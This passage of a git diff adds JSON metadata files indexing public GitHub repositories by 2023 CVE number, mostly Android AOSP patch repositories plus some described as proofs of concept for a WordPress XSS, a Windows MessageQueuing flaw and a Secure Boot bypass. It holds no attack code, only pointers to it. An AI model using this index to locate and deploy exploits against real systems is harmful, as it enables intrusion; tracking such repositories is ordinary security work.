+ "id": 709780898, + "name": "packages_apps_Settings_CVE-2023-21086", + "full_name": "Trinadh465\/packages_apps_Settings_CVE-2023-21086", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_CVE-2023-21086", + "description": null, + "fork": false, + "created_at": "2023-10-25T11:42:32Z", + "updated_at": "2023-10-25T11:54:12Z", + "pushed_at": "2023-10-25T12:25:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21094.json b/2023/CVE-2023-21094.json new file mode 100644 index 0000000000..585b2fe0cb --- /dev/null +++ b/2023/CVE-2023-21094.json @@ -0,0 +1,33 @@ +[ + { + "id": 709692273, + "name": "frameworks_native_AOSP-10_r33_CVE-2023-21094", + "full_name": "Trinadh465\/frameworks_native_AOSP-10_r33_CVE-2023-21094", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_native_AOSP-10_r33_CVE-2023-21094", + "description": null, + "fork": false, + "created_at": "2023-10-25T07:54:39Z", + "updated_at": "2024-11-26T10:43:39Z", + "pushed_at": "2023-10-25T08:11:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21097.json b/2023/CVE-2023-21097.json new file mode 100644 index 0000000000..83abfe7ad9 --- /dev/null +++ b/2023/CVE-2023-21097.json @@ -0,0 +1,64 @@ +[ + { + "id": 710167473, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21097", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21097", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21097", + "description": null, + "fork": false, + "created_at": "2023-10-26T06:46:14Z", + "updated_at": "2023-10-26T06:52:57Z", + "pushed_at": "2023-10-26T06:51:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710334684, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21097", + "full_name": "uthrasri\/frameworks_base_AOSP10_r33_CVE-2023-21097", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/frameworks_base_AOSP10_r33_CVE-2023-21097", + "description": null, + "fork": false, + "created_at": "2023-10-26T13:44:13Z", + "updated_at": "2023-10-26T15:14:58Z", + "pushed_at": "2023-10-26T19:58:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21109.json b/2023/CVE-2023-21109.json new file mode 100644 index 0000000000..49750be6cc --- /dev/null +++ b/2023/CVE-2023-21109.json @@ -0,0 +1,64 @@ +[ + { + "id": 720349935, + "name": "frameworks_base_AOSP10_CVE-2023-21109r33_", + "full_name": "Trinadh465\/frameworks_base_AOSP10_CVE-2023-21109r33_", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_CVE-2023-21109r33_", + "description": null, + "fork": false, + "created_at": "2023-11-18T07:50:57Z", + "updated_at": "2023-11-18T07:50:57Z", + "pushed_at": "2023-11-18T07:50:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 720351156, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21109", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21109", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21109", + "description": null, + "fork": false, + "created_at": "2023-11-18T07:56:12Z", + "updated_at": "2023-11-18T08:39:11Z", + "pushed_at": "2023-11-18T11:41:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21118.json b/2023/CVE-2023-21118.json new file mode 100644 index 0000000000..2e005d60a8 --- /dev/null +++ b/2023/CVE-2023-21118.json @@ -0,0 +1,64 @@ +[ + { + "id": 729085770, + "name": "frameworks_native_AOSP-10_r33_CVE-2023-21118", + "full_name": "Trinadh465\/frameworks_native_AOSP-10_r33_CVE-2023-21118", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_native_AOSP-10_r33_CVE-2023-21118", + "description": null, + "fork": false, + "created_at": "2023-12-08T11:29:23Z", + "updated_at": "2023-12-08T11:31:11Z", + "pushed_at": "2023-12-08T11:31:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 763868272, + "name": "frameworks_native_AOSP10_r33_CVE-2023-21118", + "full_name": "Satheesh575555\/frameworks_native_AOSP10_r33_CVE-2023-21118", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_native_AOSP10_r33_CVE-2023-21118", + "description": null, + "fork": false, + "created_at": "2024-02-27T03:59:23Z", + "updated_at": "2024-02-27T04:13:46Z", + "pushed_at": "2024-02-27T04:14:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2114.json b/2023/CVE-2023-2114.json new file mode 100644 index 0000000000..95b551891b --- /dev/null +++ b/2023/CVE-2023-2114.json @@ -0,0 +1,33 @@ +[ + { + "id": 623929197, + "name": "nex-forms_SQL-Injection-CVE-2023-2114", + "full_name": "SchmidAlex\/nex-forms_SQL-Injection-CVE-2023-2114", + "owner": { + "login": "SchmidAlex", + "id": 91736634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91736634?v=4", + "html_url": "https:\/\/github.com\/SchmidAlex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SchmidAlex\/nex-forms_SQL-Injection-CVE-2023-2114", + "description": "Quick Review about the SQL-Injection in the NEX-Forms Plugin for WordPress", + "fork": false, + "created_at": "2023-04-05T11:42:27Z", + "updated_at": "2024-10-15T07:45:41Z", + "pushed_at": "2023-06-05T16:36:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21144.json b/2023/CVE-2023-21144.json new file mode 100644 index 0000000000..f1cf7f1dfa --- /dev/null +++ b/2023/CVE-2023-21144.json @@ -0,0 +1,64 @@ +[ + { + "id": 730517826, + "name": "Framework_base_AOSP10_r33_CVE-2023-21144_old", + "full_name": "hshivhare67\/Framework_base_AOSP10_r33_CVE-2023-21144_old", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Framework_base_AOSP10_r33_CVE-2023-21144_old", + "description": null, + "fork": false, + "created_at": "2023-12-12T05:14:32Z", + "updated_at": "2024-02-28T07:12:02Z", + "pushed_at": "2023-12-12T05:15:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730528882, + "name": "Framework_base_AOSP10_r33_CVE-2023-21144", + "full_name": "hshivhare67\/Framework_base_AOSP10_r33_CVE-2023-21144", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Framework_base_AOSP10_r33_CVE-2023-21144", + "description": null, + "fork": false, + "created_at": "2023-12-12T05:54:11Z", + "updated_at": "2024-02-28T07:12:29Z", + "pushed_at": "2023-12-12T06:00:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2123.json b/2023/CVE-2023-2123.json new file mode 100644 index 0000000000..f98b677a11 --- /dev/null +++ b/2023/CVE-2023-2123.json @@ -0,0 +1,36 @@ +[ + { + "id": 628442068, + "name": "poc-cve-xss-encoded-wp-inventory-manager-plugin", + "full_name": "0xn4d\/poc-cve-xss-encoded-wp-inventory-manager-plugin", + "owner": { + "login": "0xn4d", + "id": 85083396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85083396?v=4", + "html_url": "https:\/\/github.com\/0xn4d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xn4d\/poc-cve-xss-encoded-wp-inventory-manager-plugin", + "description": "PoC for CVE-2023-2123", + "fork": false, + "created_at": "2023-04-16T00:33:56Z", + "updated_at": "2024-04-22T13:52:20Z", + "pushed_at": "2023-06-21T14:38:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-2123", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21238.json b/2023/CVE-2023-21238.json new file mode 100644 index 0000000000..ed72c78110 --- /dev/null +++ b/2023/CVE-2023-21238.json @@ -0,0 +1,33 @@ +[ + { + "id": 702861024, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21238", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21238", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21238", + "description": null, + "fork": false, + "created_at": "2023-10-10T06:46:00Z", + "updated_at": "2023-10-10T06:57:51Z", + "pushed_at": "2023-10-10T06:56:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21246.json b/2023/CVE-2023-21246.json new file mode 100644 index 0000000000..d28a1497ee --- /dev/null +++ b/2023/CVE-2023-21246.json @@ -0,0 +1,33 @@ +[ + { + "id": 702369565, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21246", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21246", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21246", + "description": null, + "fork": false, + "created_at": "2023-10-09T07:33:24Z", + "updated_at": "2023-10-09T07:39:52Z", + "pushed_at": "2023-10-09T11:49:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21251.json b/2023/CVE-2023-21251.json new file mode 100644 index 0000000000..fc79c7c97d --- /dev/null +++ b/2023/CVE-2023-21251.json @@ -0,0 +1,33 @@ +[ + { + "id": 703923876, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21251", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21251", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21251", + "description": null, + "fork": false, + "created_at": "2023-10-12T07:30:13Z", + "updated_at": "2023-10-12T07:35:27Z", + "pushed_at": "2023-10-12T07:34:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21272.json b/2023/CVE-2023-21272.json new file mode 100644 index 0000000000..1a24be1a61 --- /dev/null +++ b/2023/CVE-2023-21272.json @@ -0,0 +1,64 @@ +[ + { + "id": 696732075, + "name": "frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272", + "full_name": "Trinadh465\/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272", + "description": null, + "fork": false, + "created_at": "2023-09-26T10:28:51Z", + "updated_at": "2023-09-26T10:36:04Z", + "pushed_at": "2023-09-26T10:36:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 700750193, + "name": "platform_frameworks_base_AOSP_10_r33_CVE-2023-21272", + "full_name": "pazhanivel07\/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272", + "description": null, + "fork": false, + "created_at": "2023-10-05T08:13:35Z", + "updated_at": "2023-10-05T08:21:14Z", + "pushed_at": "2023-10-05T08:20:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21275.json b/2023/CVE-2023-21275.json new file mode 100644 index 0000000000..c358d8f301 --- /dev/null +++ b/2023/CVE-2023-21275.json @@ -0,0 +1,33 @@ +[ + { + "id": 700806018, + "name": "packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275", + "full_name": "Trinadh465\/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275", + "description": null, + "fork": false, + "created_at": "2023-10-05T10:30:41Z", + "updated_at": "2023-10-05T10:32:25Z", + "pushed_at": "2023-10-05T10:32:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21281.json b/2023/CVE-2023-21281.json new file mode 100644 index 0000000000..c3f7484868 --- /dev/null +++ b/2023/CVE-2023-21281.json @@ -0,0 +1,33 @@ +[ + { + "id": 699780067, + "name": "platform_frameworks_base_CVE-2023-21281", + "full_name": "Trinadh465\/platform_frameworks_base_CVE-2023-21281", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_CVE-2023-21281", + "description": null, + "fork": false, + "created_at": "2023-10-03T10:23:48Z", + "updated_at": "2023-10-03T10:32:15Z", + "pushed_at": "2023-10-03T10:31:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21282.json b/2023/CVE-2023-21282.json new file mode 100644 index 0000000000..2df78293f1 --- /dev/null +++ b/2023/CVE-2023-21282.json @@ -0,0 +1,64 @@ +[ + { + "id": 700249234, + "name": "external_aac_AOSP10_r33_CVE-2023-21282", + "full_name": "Trinadh465\/external_aac_AOSP10_r33_CVE-2023-21282", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_aac_AOSP10_r33_CVE-2023-21282", + "description": null, + "fork": false, + "created_at": "2023-10-04T08:31:10Z", + "updated_at": "2023-10-04T08:33:06Z", + "pushed_at": "2023-10-04T08:33:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 774784509, + "name": "external_aac_android-4.2.2_r1_CVE-2023-21282", + "full_name": "Trinadh465\/external_aac_android-4.2.2_r1_CVE-2023-21282", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_aac_android-4.2.2_r1_CVE-2023-21282", + "description": null, + "fork": false, + "created_at": "2024-03-20T07:15:49Z", + "updated_at": "2024-03-20T07:18:33Z", + "pushed_at": "2024-03-20T07:18:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21284.json b/2023/CVE-2023-21284.json new file mode 100644 index 0000000000..baf36109c3 --- /dev/null +++ b/2023/CVE-2023-21284.json @@ -0,0 +1,33 @@ +[ + { + "id": 700773248, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21284", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21284", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21284", + "description": null, + "fork": false, + "created_at": "2023-10-05T09:10:47Z", + "updated_at": "2023-10-05T09:22:59Z", + "pushed_at": "2023-10-05T09:22:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21285.json b/2023/CVE-2023-21285.json new file mode 100644 index 0000000000..19b9714b83 --- /dev/null +++ b/2023/CVE-2023-21285.json @@ -0,0 +1,33 @@ +[ + { + "id": 728564763, + "name": "framework_base_CVE-2023-21285_NoPatch", + "full_name": "uthrasri\/framework_base_CVE-2023-21285_NoPatch", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/framework_base_CVE-2023-21285_NoPatch", + "description": null, + "fork": false, + "created_at": "2023-12-07T08:03:03Z", + "updated_at": "2023-12-11T18:17:37Z", + "pushed_at": "2023-12-07T09:13:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21286.json b/2023/CVE-2023-21286.json new file mode 100644 index 0000000000..2a28515d00 --- /dev/null +++ b/2023/CVE-2023-21286.json @@ -0,0 +1,33 @@ +[ + { + "id": 699793027, + "name": "platform_frameworks_base_CVE-2023-21286", + "full_name": "Trinadh465\/platform_frameworks_base_CVE-2023-21286", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_CVE-2023-21286", + "description": null, + "fork": false, + "created_at": "2023-10-03T10:58:51Z", + "updated_at": "2023-10-03T11:06:54Z", + "pushed_at": "2023-10-03T11:06:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21288.json b/2023/CVE-2023-21288.json new file mode 100644 index 0000000000..7caf402e2d --- /dev/null +++ b/2023/CVE-2023-21288.json @@ -0,0 +1,33 @@ +[ + { + "id": 700206219, + "name": "platform_frameworks_base_CVE-2023-21288", + "full_name": "Trinadh465\/platform_frameworks_base_CVE-2023-21288", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_CVE-2023-21288", + "description": null, + "fork": false, + "created_at": "2023-10-04T06:42:19Z", + "updated_at": "2023-10-04T06:48:34Z", + "pushed_at": "2023-10-04T07:10:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21554.json b/2023/CVE-2023-21554.json new file mode 100644 index 0000000000..868611c1aa --- /dev/null +++ b/2023/CVE-2023-21554.json @@ -0,0 +1,64 @@ +[ + { + "id": 642331320, + "name": "CVE-2023-21554-PoC", + "full_name": "zoemurmure\/CVE-2023-21554-PoC", + "owner": { + "login": "zoemurmure", + "id": 43516782, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43516782?v=4", + "html_url": "https:\/\/github.com\/zoemurmure", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zoemurmure\/CVE-2023-21554-PoC", + "description": "CVE-2023-21554 Windows MessageQueuing PoC,分析见 https:\/\/www.zoemurmure.top\/posts\/cve_2023_21554\/", + "fork": false, + "created_at": "2023-05-18T10:30:49Z", + "updated_at": "2024-11-18T13:26:39Z", + "pushed_at": "2023-05-18T10:38:57Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 54, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 679812800, + "name": "CVE-2023-21554", + "full_name": "3tternp\/CVE-2023-21554", + "owner": { + "login": "3tternp", + "id": 26215963, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26215963?v=4", + "html_url": "https:\/\/github.com\/3tternp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3tternp\/CVE-2023-21554", + "description": null, + "fork": false, + "created_at": "2023-08-17T17:16:46Z", + "updated_at": "2024-10-30T14:41:33Z", + "pushed_at": "2023-08-21T21:22:40Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21560.json b/2023/CVE-2023-21560.json new file mode 100644 index 0000000000..3a6d1c4eb5 --- /dev/null +++ b/2023/CVE-2023-21560.json @@ -0,0 +1,44 @@ +[ + { + "id": 811928581, + "name": "dubiousdisk", + "full_name": "Wack0\/dubiousdisk", + "owner": { + "login": "Wack0", + "id": 2650838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2650838?v=4", + "html_url": "https:\/\/github.com\/Wack0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wack0\/dubiousdisk", + "description": "The Porygon-Z that's super effective against Secure Boot! (CVE-2022-30203, CVE-2023-21560, CVE-2023-28269, CVE-2023-28249, and more...)", + "fork": false, + "created_at": "2024-06-07T15:25:33Z", + "updated_at": "2024-10-09T02:12:28Z", + "pushed_at": "2024-06-07T15:26:02Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bitlocker", + "cve-2022-30203", + "cve-2023-21560", + "cve-2023-28249", + "cve-2023-28269", + "secure-boot", + 